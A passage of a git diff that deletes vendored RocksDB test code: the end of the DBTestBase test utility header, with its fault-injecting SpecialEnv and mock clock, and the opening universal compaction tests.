-        random_number = rnd_.Uniform(100);
-      }
-      if (random_number < non_writeable_rate_.load()) {
-        return Status::IOError("simulated random write error");
-      }
-    }
-
-    new_writable_count_++;
-
-    if (non_writable_count_.load() > 0) {
-      non_writable_count_--;
-      return Status::IOError("simulated write error");
-    }
-
-    EnvOptions optimized = soptions;
-    if (strstr(f.c_str(), "MANIFEST") != nullptr ||
-        strstr(f.c_str(), "log") != nullptr) {
-      optimized.use_mmap_writes = false;
-      optimized.use_direct_writes = false;
-    }
-
-    Status s = target()->NewWritableFile(f, r, optimized);
-    if (s.ok()) {
-      if (strstr(f.c_str(), ".sst") != nullptr) {
-        r->reset(new SSTableFile(this, std::move(*r)));
-      } else if (strstr(f.c_str(), "MANIFEST") != nullptr) {
-        r->reset(new ManifestFile(this, std::move(*r)));
-      } else if (strstr(f.c_str(), "log") != nullptr) {
-        r->reset(new WalFile(this, std::move(*r)));
-      }
-    }
-    return s;
-  }
-
-  Status NewRandomAccessFile(const std::string& f,
-                             unique_ptr<RandomAccessFile>* r,
-                             const EnvOptions& soptions) override {
-    class CountingFile : public RandomAccessFile {
-     public:
-      CountingFile(unique_ptr<RandomAccessFile>&& target,
-                   anon::AtomicCounter* counter,
-                   std::atomic<size_t>* bytes_read)
-          : target_(std::move(target)),
-            counter_(counter),
-            bytes_read_(bytes_read) {}
-      virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                          char* scratch) const override {
-        counter_->Increment();
-        Status s = target_->Read(offset, n, result, scratch);
-        *bytes_read_ += result->size();
-        return s;
-      }
-
-     private:
-      unique_ptr<RandomAccessFile> target_;
-      anon::AtomicCounter* counter_;
-      std::atomic<size_t>* bytes_read_;
-    };
-
-    Status s = target()->NewRandomAccessFile(f, r, soptions);
-    random_file_open_counter_++;
-    if (s.ok() && count_random_reads_) {
-      r->reset(new CountingFile(std::move(*r), &random_read_counter_,
-                                &random_read_bytes_counter_));
-    }
-    return s;
-  }
-
-  Status NewSequentialFile(const std::string& f, unique_ptr<SequentialFile>* r,
-                           const EnvOptions& soptions) override {
-    class CountingFile : public SequentialFile {
-     public:
-      CountingFile(unique_ptr<SequentialFile>&& target,
-                   anon::AtomicCounter* counter)
-          : target_(std::move(target)), counter_(counter) {}
-      virtual Status Read(size_t n, Slice* result, char* scratch) override {
-        counter_->Increment();
-        return target_->Read(n, result, scratch);
-      }
-      virtual Status Skip(uint64_t n) override { return target_->Skip(n); }
-
-     private:
-      unique_ptr<SequentialFile> target_;
-      anon::AtomicCounter* counter_;
-    };
-
-    Status s = target()->NewSequentialFile(f, r, soptions);
-    if (s.ok() && count_sequential_reads_) {
-      r->reset(new CountingFile(std::move(*r), &sequential_read_counter_));
-    }
-    return s;
-  }
-
-  virtual void SleepForMicroseconds(int micros) override {
-    sleep_counter_.Increment();
-    if (no_slowdown_ || time_elapse_only_sleep_) {
-      addon_time_.fetch_add(micros);
-    }
-    if (!no_slowdown_) {
-      target()->SleepForMicroseconds(micros);
-    }
-  }
-
-  virtual Status GetCurrentTime(int64_t* unix_time) override {
-    Status s;
-    if (!time_elapse_only_sleep_) {
-      s = target()->GetCurrentTime(unix_time);
-    }
-    if (s.ok()) {
-      *unix_time += addon_time_.load();
-    }
-    return s;
-  }
-
-  virtual uint64_t NowNanos() override {
-    return (time_elapse_only_sleep_ ? 0 : target()->NowNanos()) +
-           addon_time_.load() * 1000;
-  }
-
-  virtual uint64_t NowMicros() override {
-    return (time_elapse_only_sleep_ ? 0 : target()->NowMicros()) +
-           addon_time_.load();
-  }
-
-  virtual Status DeleteFile(const std::string& fname) override {
-    delete_count_.fetch_add(1);
-    return target()->DeleteFile(fname);
-  }
-
-  Random rnd_;
-  port::Mutex rnd_mutex_;  // Lock to pretect rnd_
-
-  // sstable Sync() calls are blocked while this pointer is non-nullptr.
-  std::atomic<bool> delay_sstable_sync_;
-
-  // Drop writes on the floor while this pointer is non-nullptr.
-  std::atomic<bool> drop_writes_;
-
-  // Simulate no-space errors while this pointer is non-nullptr.
-  std::atomic<bool> no_space_;
-
-  // Simulate non-writable file system while this pointer is non-nullptr
-  std::atomic<bool> non_writable_;
-
-  // Force sync of manifest files to fail while this pointer is non-nullptr
-  std::atomic<bool> manifest_sync_error_;
-
-  // Force write to manifest files to fail while this pointer is non-nullptr
-  std::atomic<bool> manifest_write_error_;
-
-  // Force write to log files to fail while this pointer is non-nullptr
-  std::atomic<bool> log_write_error_;
-
-  // Slow down every log write, in micro-seconds.
-  std::atomic<int> log_write_slowdown_;
-
-  // Number of WAL files that are still open for write.
-  std::atomic<int> num_open_wal_file_;
-
-  bool count_random_reads_;
-  anon::AtomicCounter random_read_counter_;
-  std::atomic<size_t> random_read_bytes_counter_;
-  std::atomic<int> random_file_open_counter_;
-
-  bool count_sequential_reads_;
-  anon::AtomicCounter sequential_read_counter_;
-
-  anon::AtomicCounter sleep_counter_;
-
-  std::atomic<int64_t> bytes_written_;
-
-  std::atomic<int> sync_counter_;
-
-  std::atomic<uint32_t> non_writeable_rate_;
-
-  std::atomic<uint32_t> new_writable_count_;
-
-  std::atomic<uint32_t> non_writable_count_;
-
-  std::function<void()>* table_write_callback_;
-
-  std::atomic<int64_t> addon_time_;
-
-  std::atomic<int> delete_count_;
-
-  bool time_elapse_only_sleep_;
-
-  bool no_slowdown_;
-
-  std::atomic<bool> is_wal_sync_thread_safe_{true};
-};
-
-class MockTimeEnv : public EnvWrapper {
- public:
-  explicit MockTimeEnv(Env* base) : EnvWrapper(base) {}
-
-  virtual Status GetCurrentTime(int64_t* time) override {
-    assert(time != nullptr);
-    assert(current_time_ <=
-           static_cast<uint64_t>(std::numeric_limits<int64_t>::max()));
-    *time = static_cast<int64_t>(current_time_);
-    return Status::OK();
-  }
-
-  virtual uint64_t NowMicros() override {
-    assert(current_time_ <= std::numeric_limits<uint64_t>::max() / 1000000);
-    return current_time_ * 1000000;
-  }
-
-  virtual uint64_t NowNanos() override {
-    assert(current_time_ <= std::numeric_limits<uint64_t>::max() / 1000000000);
-    return current_time_ * 1000000000;
-  }
-
-  void set_current_time(uint64_t time) {
-    assert(time >= current_time_);
-    current_time_ = time;
-  }
-
- private:
-  uint64_t current_time_ = 0;
-};
-
-#ifndef ROCKSDB_LITE
-class OnFileDeletionListener : public EventListener {
- public:
-  OnFileDeletionListener() : matched_count_(0), expected_file_name_("") {}
-
-  void SetExpectedFileName(const std::string file_name) {
-    expected_file_name_ = file_name;
-  }
-
-  void VerifyMatchedCount(size_t expected_value) {
-    ASSERT_EQ(matched_count_, expected_value);
-  }
-
-  void OnTableFileDeleted(const TableFileDeletionInfo& info) override {
-    if (expected_file_name_ != "") {
-      ASSERT_EQ(expected_file_name_, info.file_path);
-      expected_file_name_ = "";
-      matched_count_++;
-    }
-  }
-
- private:
-  size_t matched_count_;
-  std::string expected_file_name_;
-};
-#endif
-
-// A test merge operator mimics put but also fails if one of merge operands is
-// "corrupted".
-class TestPutOperator : public MergeOperator {
- public:
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
-    if (merge_in.existing_value != nullptr &&
-        *(merge_in.existing_value) == "corrupted") {
-      return false;
-    }
-    for (auto value : merge_in.operand_list) {
-      if (value == "corrupted") {
-        return false;
-      }
-    }
-    merge_out->existing_operand = merge_in.operand_list.back();
-    return true;
-  }
-
-  virtual const char* Name() const override { return "TestPutOperator"; }
-};
-
-class DBTestBase : public testing::Test {
- public:
-  // Sequence of option configurations to try
-  enum OptionConfig : int {
-    kDefault = 0,
-    kBlockBasedTableWithPrefixHashIndex = 1,
-    kBlockBasedTableWithWholeKeyHashIndex = 2,
-    kPlainTableFirstBytePrefix = 3,
-    kPlainTableCappedPrefix = 4,
-    kPlainTableCappedPrefixNonMmap = 5,
-    kPlainTableAllBytesPrefix = 6,
-    kVectorRep = 7,
-    kHashLinkList = 8,
-    kHashCuckoo = 9,
-    kMergePut = 10,
-    kFilter = 11,
-    kFullFilterWithNewTableReaderForCompactions = 12,
-    kUncompressed = 13,
-    kNumLevel_3 = 14,
-    kDBLogDir = 15,
-    kWalDirAndMmapReads = 16,
-    kManifestFileSize = 17,
-    kPerfOptions = 18,
-    kHashSkipList = 19,
-    kUniversalCompaction = 20,
-    kUniversalCompactionMultiLevel = 21,
-    kCompressedBlockCache = 22,
-    kInfiniteMaxOpenFiles = 23,
-    kxxHashChecksum = 24,
-    kFIFOCompaction = 25,
-    kOptimizeFiltersForHits = 26,
-    kRowCache = 27,
-    kRecycleLogFiles = 28,
-    kConcurrentSkipList = 29,
-    kPipelinedWrite = 30,
-    kConcurrentWALWrites = 31,
-    kEnd = 32,
-    kDirectIO = 33,
-    kLevelSubcompactions = 34,
-    kUniversalSubcompactions = 35,
-    kBlockBasedTableWithIndexRestartInterval = 36,
-    kBlockBasedTableWithPartitionedIndex = 37,
-    kPartitionedFilterWithNewTableReaderForCompactions = 38,
-  };
-
- public:
-  std::string dbname_;
-  std::string alternative_wal_dir_;
-  std::string alternative_db_log_dir_;
-  MockEnv* mem_env_;
-  Env* encrypted_env_;
-  SpecialEnv* env_;
-  DB* db_;
-  std::vector<ColumnFamilyHandle*> handles_;
-
-  int option_config_;
-  Options last_options_;
-
-  // Skip some options, as they may not be applicable to a specific test.
-  // To add more skip constants, use values 4, 8, 16, etc.
-  enum OptionSkip {
-    kNoSkip = 0,
-    kSkipDeletesFilterFirst = 1,
-    kSkipUniversalCompaction = 2,
-    kSkipMergePut = 4,
-    kSkipPlainTable = 8,
-    kSkipHashIndex = 16,
-    kSkipNoSeekToLast = 32,
-    kSkipHashCuckoo = 64,
-    kSkipFIFOCompaction = 128,
-    kSkipMmapReads = 256,
-  };
-
-  explicit DBTestBase(const std::string path);
-
-  ~DBTestBase();
-
-  static std::string RandomString(Random* rnd, int len) {
-    std::string r;
-    test::RandomString(rnd, len, &r);
-    return r;
-  }
-
-  static std::string Key(int i) {
-    char buf[100];
-    snprintf(buf, sizeof(buf), "key%06d", i);
-    return std::string(buf);
-  }
-
-  static bool ShouldSkipOptions(int option_config, int skip_mask = kNoSkip);
-
-  // Switch to a fresh database with the next option configuration to
-  // test.  Return false if there are no more configurations to test.
-  bool ChangeOptions(int skip_mask = kNoSkip);
-
-  // Switch between different compaction styles.
-  bool ChangeCompactOptions();
-
-  // Switch between different WAL-realted options.
-  bool ChangeWalOptions();
-
-  // Switch between different filter policy
-  // Jump from kDefault to kFilter to kFullFilter
-  bool ChangeFilterOptions();
-
-  // Return the current option configuration.
-  Options CurrentOptions(const anon::OptionsOverride& options_override =
-                             anon::OptionsOverride()) const;
-
-  Options CurrentOptions(const Options& default_options,
-                         const anon::OptionsOverride& options_override =
-                             anon::OptionsOverride()) const;
-
-  static Options GetDefaultOptions();
-
-  Options GetOptions(int option_config,
-                     const Options& default_options = GetDefaultOptions(),
-                     const anon::OptionsOverride& options_override =
-                         anon::OptionsOverride()) const;
-
-  DBImpl* dbfull() { return reinterpret_cast<DBImpl*>(db_); }
-
-  void CreateColumnFamilies(const std::vector<std::string>& cfs,
-                            const Options& options);
-
-  void CreateAndReopenWithCF(const std::vector<std::string>& cfs,
-                             const Options& options);
-
-  void ReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                const std::vector<Options>& options);
-
-  void ReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                const Options& options);
-
-  Status TryReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                     const std::vector<Options>& options);
-
-  Status TryReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                     const Options& options);
-
-  void Reopen(const Options& options);
-
-  void Close();
-
-  void DestroyAndReopen(const Options& options);
-
-  void Destroy(const Options& options);
-
-  Status ReadOnlyReopen(const Options& options);
-
-  Status TryReopen(const Options& options);
-
-  bool IsDirectIOSupported();
-
-  bool IsMemoryMappedAccessSupported() const;
-
-  Status Flush(int cf = 0);
-
-  Status Put(const Slice& k, const Slice& v, WriteOptions wo = WriteOptions());
-
-  Status Put(int cf, const Slice& k, const Slice& v,
-             WriteOptions wo = WriteOptions());
-
-  Status Merge(const Slice& k, const Slice& v,
-               WriteOptions wo = WriteOptions());
-
-  Status Merge(int cf, const Slice& k, const Slice& v,
-               WriteOptions wo = WriteOptions());
-
-  Status Delete(const std::string& k);
-
-  Status Delete(int cf, const std::string& k);
-
-  Status SingleDelete(const std::string& k);
-
-  Status SingleDelete(int cf, const std::string& k);
-
-  std::string Get(const std::string& k, const Snapshot* snapshot = nullptr);
-
-  std::string Get(int cf, const std::string& k,
-                  const Snapshot* snapshot = nullptr);
-
-  Status Get(const std::string& k, PinnableSlice* v);
-
-  uint64_t GetNumSnapshots();
-
-  uint64_t GetTimeOldestSnapshots();
-
-  // Return a string that contains all key,value pairs in order,
-  // formatted like "(k1->v1)(k2->v2)".
-  std::string Contents(int cf = 0);
-
-  std::string AllEntriesFor(const Slice& user_key, int cf = 0);
-
-#ifndef ROCKSDB_LITE
-  int NumSortedRuns(int cf = 0);
-
-  uint64_t TotalSize(int cf = 0);
-
-  uint64_t SizeAtLevel(int level);
-
-  size_t TotalLiveFiles(int cf = 0);
-
-  size_t CountLiveFiles();
-#endif  // ROCKSDB_LITE
-
-  int NumTableFilesAtLevel(int level, int cf = 0);
-
-  double CompressionRatioAtLevel(int level, int cf = 0);
-
-  int TotalTableFiles(int cf = 0, int levels = -1);
-
-  // Return spread of files per level
-  std::string FilesPerLevel(int cf = 0);
-
-  size_t CountFiles();
-
-  uint64_t Size(const Slice& start, const Slice& limit, int cf = 0);
-
-  void Compact(int cf, const Slice& start, const Slice& limit,
-               uint32_t target_path_id);
-
-  void Compact(int cf, const Slice& start, const Slice& limit);
-
-  void Compact(const Slice& start, const Slice& limit);
-
-  // Do n memtable compactions, each of which produces an sstable
-  // covering the range [small,large].
-  void MakeTables(int n, const std::string& small, const std::string& large,
-                  int cf = 0);
-
-  // Prevent pushing of new sstables into deeper levels by adding
-  // tables that cover a specified range to all levels.
-  void FillLevels(const std::string& smallest, const std::string& largest,
-                  int cf);
-
-  void MoveFilesToLevel(int level, int cf = 0);
-
-  void DumpFileCounts(const char* label);
-
-  std::string DumpSSTableList();
-
-  void GetSstFiles(std::string path, std::vector<std::string>* files);
-
-  int GetSstFileCount(std::string path);
-
-  // this will generate non-overlapping files since it keeps increasing key_idx
-  void GenerateNewFile(Random* rnd, int* key_idx, bool nowait = false);
-
-  void GenerateNewFile(int fd, Random* rnd, int* key_idx, bool nowait = false);
-
-  static const int kNumKeysByGenerateNewRandomFile;
-  static const int KNumKeysByGenerateNewFile = 100;
-
-  void GenerateNewRandomFile(Random* rnd, bool nowait = false);
-
-  std::string IterStatus(Iterator* iter);
-
-  Options OptionsForLogIterTest();
-
-  std::string DummyString(size_t len, char c = 'a');
-
-  void VerifyIterLast(std::string expected_key, int cf = 0);
-
-  // Used to test InplaceUpdate
-
-  // If previous value is nullptr or delta is > than previous value,
-  //   sets newValue with delta
-  // If previous value is not empty,
-  //   updates previous value with 'b' string of previous value size - 1.
-  static UpdateStatus updateInPlaceSmallerSize(char* prevValue,
-                                               uint32_t* prevSize, Slice delta,
-                                               std::string* newValue);
-
-  static UpdateStatus updateInPlaceSmallerVarintSize(char* prevValue,
-                                                     uint32_t* prevSize,
-                                                     Slice delta,
-                                                     std::string* newValue);
-
-  static UpdateStatus updateInPlaceLargerSize(char* prevValue,
-                                              uint32_t* prevSize, Slice delta,
-                                              std::string* newValue);
-
-  static UpdateStatus updateInPlaceNoAction(char* prevValue, uint32_t* prevSize,
-                                            Slice delta, std::string* newValue);
-
-  // Utility method to test InplaceUpdate
-  void validateNumberOfEntries(int numValues, int cf = 0);
-
-  void CopyFile(const std::string& source, const std::string& destination,
-                uint64_t size = 0);
-
-  std::unordered_map<std::string, uint64_t> GetAllSSTFiles(
-      uint64_t* total_size = nullptr);
-
-  std::vector<std::uint64_t> ListTableFiles(Env* env, const std::string& path);
-
-  void VerifyDBFromMap(
-      std::map<std::string, std::string> true_data,
-      size_t* total_reads_res = nullptr, bool tailing_iter = false,
-      std::map<std::string, Status> status = std::map<std::string, Status>());
-
-  void VerifyDBInternal(
-      std::vector<std::pair<std::string, std::string>> true_data);
-
-#ifndef ROCKSDB_LITE
-  uint64_t GetNumberOfSstFilesForColumnFamily(DB* db,
-                                              std::string column_family_name);
-#endif  // ROCKSDB_LITE
-
-  uint64_t TestGetTickerCount(const Options& options, Tickers ticker_type) {
-    return options.statistics->getTickerCount(ticker_type);
-  }
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_universal_compaction_test.cc b/thirdparty/rocksdb/db/db_universal_compaction_test.cc
deleted file mode 100644
index 58fda80..0000000
--- a/thirdparty/rocksdb/db/db_universal_compaction_test.cc
+++ /dev/null
@@ -1,1589 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-#if !defined(ROCKSDB_LITE)
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-static std::string CompressibleString(Random* rnd, int len) {
-  std::string r;
-  test::CompressibleString(rnd, 0.8, len, &r);
-  return r;
-}
-
-class DBTestUniversalCompactionBase
-    : public DBTestBase,
-      public ::testing::WithParamInterface<std::tuple<int, bool>> {
- public:
-  explicit DBTestUniversalCompactionBase(
-      const std::string& path) : DBTestBase(path) {}
-  virtual void SetUp() override {
-    num_levels_ = std::get<0>(GetParam());
-    exclusive_manual_compaction_ = std::get<1>(GetParam());
-  }
-  int num_levels_;
-  bool exclusive_manual_compaction_;
-};
-
-class DBTestUniversalCompaction : public DBTestUniversalCompactionBase {
- public:
-  DBTestUniversalCompaction() :
-      DBTestUniversalCompactionBase("/db_universal_compaction_test") {}
-};
-
-namespace {
-void VerifyCompactionResult(
-    const ColumnFamilyMetaData& cf_meta,
-    const std::set<std::string>& overlapping_file_numbers) {
-#ifndef NDEBUG
-  for (auto& level : cf_meta.levels) {
-    for (auto& file : level.files) {
-      assert(overlapping_file_numbers.find(file.name) ==
-             overlapping_file_numbers.end());
-    }
-  }
-#endif
-}
-
-class KeepFilter : public CompactionFilter {
- public:
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value, bool* value_changed) const
-      override {
-    return false;
-  }
-
-  virtual const char* Name() const override { return "KeepFilter"; }
-};
-
-class KeepFilterFactory : public CompactionFilterFactory {
- public:
-  explicit KeepFilterFactory(bool check_context = false)
-      : check_context_(check_context) {}
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    if (check_context_) {
-      EXPECT_EQ(expect_full_compaction_.load(), context.is_full_compaction);
-      EXPECT_EQ(expect_manual_compaction_.load(), context.is_manual_compaction);
-    }
-    return std::unique_ptr<CompactionFilter>(new KeepFilter());
-  }
-
-  virtual const char* Name() const override { return "KeepFilterFactory"; }
-  bool check_context_;
-  std::atomic_bool expect_full_compaction_;
-  std::atomic_bool expect_manual_compaction_;
-};
-
-class DelayFilter : public CompactionFilter {
- public:
-  explicit DelayFilter(DBTestBase* d) : db_test(d) {}
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
-    db_test->env_->addon_time_.fetch_add(1000);
-    return true;
-  }
-
-  virtual const char* Name() const override { return "DelayFilter"; }
-
- private:
-  DBTestBase* db_test;
-};
-
-class DelayFilterFactory : public CompactionFilterFactory {
- public:
-  explicit DelayFilterFactory(DBTestBase* d) : db_test(d) {}
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    return std::unique_ptr<CompactionFilter>(new DelayFilter(db_test));
-  }
-
-  virtual const char* Name() const override { return "DelayFilterFactory"; }
-
- private:
-  DBTestBase* db_test;
-};
-}  // namespace
-
-// Make sure we don't trigger a problem if the trigger condtion is given
-// to be 0, which is invalid.
-TEST_P(DBTestUniversalCompaction, UniversalCompactionSingleSortedRun) {
-  Options options = CurrentOptions();
-
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = num_levels_;
-  // Config universal compaction to always compact to one single sorted run.
-  options.level0_file_num_compaction_trigger = 0;
-  options.compaction_options_universal.size_ratio = 10;
-  options.compaction_options_universal.min_merge_width = 2;
-  options.compaction_options_universal.max_size_amplification_percent = 0;
-
-  options.write_buffer_size = 105 << 10;  // 105KB
-  options.arena_block_size = 4 << 10;
-  options.target_file_size_base = 32 << 10;  // 32KB
-  // trigger compaction if there are >= 4 files
-  KeepFilterFactory* filter = new KeepFilterFactory(true);
-  filter->expect_manual_compaction_.store(false);
-  options.compaction_filter_factory.reset(filter);
-
-  DestroyAndReopen(options);
-  ASSERT_EQ(1, db_->GetOptions().level0_file_num_compaction_trigger);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  filter->expect_full_compaction_.store(true);
-
-  for (int num = 0; num < 16; num++) {
-    // Write 100KB file. And immediately it should be compacted to one file.
-    GenerateNewFile(&rnd, &key_idx);
-    dbfull()->TEST_WaitForCompact();
-    ASSERT_EQ(NumSortedRuns(0), 1);
-  }
-  ASSERT_OK(Put(Key(key_idx), ""));
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ(NumSortedRuns(0), 1);
-}
-
-TEST_P(DBTestUniversalCompaction, OptimizeFiltersForHits) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.compaction_options_universal.size_ratio = 5;
-  options.num_levels = num_levels_;
-  options.write_buffer_size = 105 << 10;  // 105KB
-  options.arena_block_size = 4 << 10;
-  options.target_file_size_base = 32 << 10;  // 32KB
-  // trigger compaction if there are >= 4 files
-  options.level0_file_num_compaction_trigger = 4;
-  BlockBasedTableOptions bbto;
-  bbto.cache_index_and_filter_blocks = true;
-  bbto.filter_policy.reset(NewBloomFilterPolicy(10, false));
-  bbto.whole_key_filtering = true;
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-  options.optimize_filters_for_hits = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.memtable_factory.reset(new SpecialSkipListFactory(3));
-
-  DestroyAndReopen(options);
-
-  // block compaction from happening
-  env_->SetBackgroundThreads(1, Env::LOW);
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-
-  for (int num = 0; num < options.level0_file_num_compaction_trigger; num++) {
-    Put(Key(num * 10), "val");
-    if (num) {
-      dbfull()->TEST_WaitForFlushMemTable();
-    }
-    Put(Key(30 + num * 10), "val");
-    Put(Key(60 + num * 10), "val");
-  }
-  Put("", "");
-  dbfull()->TEST_WaitForFlushMemTable();
-
-  // Query set of non existing keys
-  for (int i = 5; i < 90; i += 10) {
-    ASSERT_EQ(Get(Key(i)), "NOT_FOUND");
-  }
-
-  // Make sure bloom filter is used at least once.
-  ASSERT_GT(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 0);
-  auto prev_counter = TestGetTickerCount(options, BLOOM_FILTER_USEFUL);
-
-  // Make sure bloom filter is used for all but the last L0 file when looking
-  // up a non-existent key that's in the range of all L0 files.
-  ASSERT_EQ(Get(Key(35)), "NOT_FOUND");
-  ASSERT_EQ(prev_counter + NumTableFilesAtLevel(0) - 1,
-            TestGetTickerCount(options, BLOOM_FILTER_USEFUL));
-  prev_counter = TestGetTickerCount(options, BLOOM_FILTER_USEFUL);
-
-  // Unblock compaction and wait it for happening.
-  sleeping_task_low.WakeUp();
-  dbfull()->TEST_WaitForCompact();
-
-  // The same queries will not trigger bloom filter
-  for (int i = 5; i < 90; i += 10) {
-    ASSERT_EQ(Get(Key(i)), "NOT_FOUND");
-  }
-  ASSERT_EQ(prev_counter, TestGetTickerCount(options, BLOOM_FILTER_USEFUL));
-}
-
-// TODO(kailiu) The tests on UniversalCompaction has some issues:
-//  1. A lot of magic numbers ("11" or "12").
-//  2. Made assumption on the memtable flush conditions, which may change from
-//     time to time.
-TEST_P(DBTestUniversalCompaction, UniversalCompactionTrigger) {
-  Options options;
-  options.compaction_style = kCompactionStyleUniversal;
-  options.compaction_options_universal.size_ratio = 5;
-  options.num_levels = num_levels_;
-  options.write_buffer_size = 105 << 10;  // 105KB
-  options.arena_block_size = 4 << 10;
-  options.target_file_size_base = 32 << 10;  // 32KB
-  // trigger compaction if there are >= 4 files
-  options.level0_file_num_compaction_trigger = 4;
-  KeepFilterFactory* filter = new KeepFilterFactory(true);
-  filter->expect_manual_compaction_.store(false);
-  options.compaction_filter_factory.reset(filter);
-
-  options = CurrentOptions(options);
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBTestWritableFile.GetPreallocationStatus", [&](void* arg) {
-        ASSERT_TRUE(arg != nullptr);
-        size_t preallocation_size = *(static_cast<size_t*>(arg));
-        if (num_levels_ > 3) {
-          ASSERT_LE(preallocation_size, options.target_file_size_base * 1.1);
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  filter->expect_full_compaction_.store(true);
-  // Stage 1:
-  //   Generate a set of files at level 0, but don't trigger level-0
-  //   compaction.
-  for (int num = 0; num < options.level0_file_num_compaction_trigger - 1;
-       num++) {
-    // Write 100KB
-    GenerateNewFile(1, &rnd, &key_idx);
-  }
-
-  // Generate one more file at level-0, which should trigger level-0
-  // compaction.
-  GenerateNewFile(1, &rnd, &key_idx);
-  // Suppose each file flushed from mem table has size 1. Now we compact
-  // (level0_file_num_compaction_trigger+1)=4 files and should have a big
-  // file of size 4.
-  ASSERT_EQ(NumSortedRuns(1), 1);
-
-  // Stage 2:
-  //   Now we have one file at level 0, with size 4. We also have some data in
-  //   mem table. Let's continue generating new files at level 0, but don't
-  //   trigger level-0 compaction.
-  //   First, clean up memtable before inserting new data. This will generate
-  //   a level-0 file, with size around 0.4 (according to previously written
-  //   data amount).
-  filter->expect_full_compaction_.store(false);
-  ASSERT_OK(Flush(1));
-  for (int num = 0; num < options.level0_file_num_compaction_trigger - 3;
-       num++) {
-    GenerateNewFile(1, &rnd, &key_idx);
-    ASSERT_EQ(NumSortedRuns(1), num + 3);
-  }
-
-  // Generate one more file at level-0, which should trigger level-0
-  // compaction.
-  GenerateNewFile(1, &rnd, &key_idx);
-  // Before compaction, we have 4 files at level 0, with size 4, 0.4, 1, 1.
-  // After compaction, we should have 2 files, with size 4, 2.4.
-  ASSERT_EQ(NumSortedRuns(1), 2);
-
-  // Stage 3:
-  //   Now we have 2 files at level 0, with size 4 and 2.4. Continue
-  //   generating new files at level 0.
-  for (int num = 0; num < options.level0_file_num_compaction_trigger - 3;
-       num++) {
-    GenerateNewFile(1, &rnd, &key_idx);
-    ASSERT_EQ(NumSortedRuns(1), num + 3);
-  }
-
-  // Generate one more file at level-0, which should trigger level-0
-  // compaction.
-  GenerateNewFile(1, &rnd, &key_idx);
-  // Before compaction, we have 4 files at level 0, with size 4, 2.4, 1, 1.
-  // After compaction, we should have 3 files, with size 4, 2.4, 2.
-  ASSERT_EQ(NumSortedRuns(1), 3);
-
-  // Stage 4:
-  //   Now we have 3 files at level 0, with size 4, 2.4, 2. Let's generate a
-  //   new file of size 1.
-  GenerateNewFile(1, &rnd, &key_idx);
-  dbfull()->TEST_WaitForCompact();
-  // Level-0 compaction is triggered, but no file will be picked up.
-  ASSERT_EQ(NumSortedRuns(1), 4);
-
-  // Stage 5:
-  //   Now we have 4 files at level 0, with size 4, 2.4, 2, 1. Let's generate
-  //   a new file of size 1.
-  filter->expect_full_compaction_.store(true);
-  GenerateNewFile(1, &rnd, &key_idx);
-  dbfull()->TEST_WaitForCompact();
-  // All files at level 0 will be compacted into a single one.
-  ASSERT_EQ(NumSortedRuns(1), 1);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_P(DBTestUniversalCompaction, UniversalCompactionSizeAmplification) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = num_levels_;
-  options.write_buffer_size = 100 << 10;     // 100KB
-  options.target_file_size_base = 32 << 10;  // 32KB
-  options.level0_file_num_compaction_trigger = 3;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Trigger compaction if size amplification exceeds 110%
-  options.compaction_options_universal.max_size_amplification_percent = 110;
-  options = CurrentOptions(options);
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  //   Generate two files in Level 0. Both files are approx the same size.
-  for (int num = 0; num < options.level0_file_num_compaction_trigger - 1;
-       num++) {
-    // Write 110KB (11 values, each 10K)
-    for (int i = 0; i < 11; i++) {
-      ASSERT_OK(Put(1, Key(key_idx), RandomString(&rnd, 10000)));
-      key_idx++;
-    }
-    dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-    ASSERT_EQ(NumSortedRuns(1), num + 1);
-  }
-  ASSERT_EQ(NumSortedRuns(1), 2);
-
-  // Flush whatever is remaining in memtable. This is typically
-  // small, which should not trigger size ratio based compaction
-  // but will instead trigger size amplification.
-  ASSERT_OK(Flush(1));
-
-  dbfull()->TEST_WaitForCompact();
-
-  // Verify that size amplification did occur
-  ASSERT_EQ(NumSortedRuns(1), 1);
-}
-
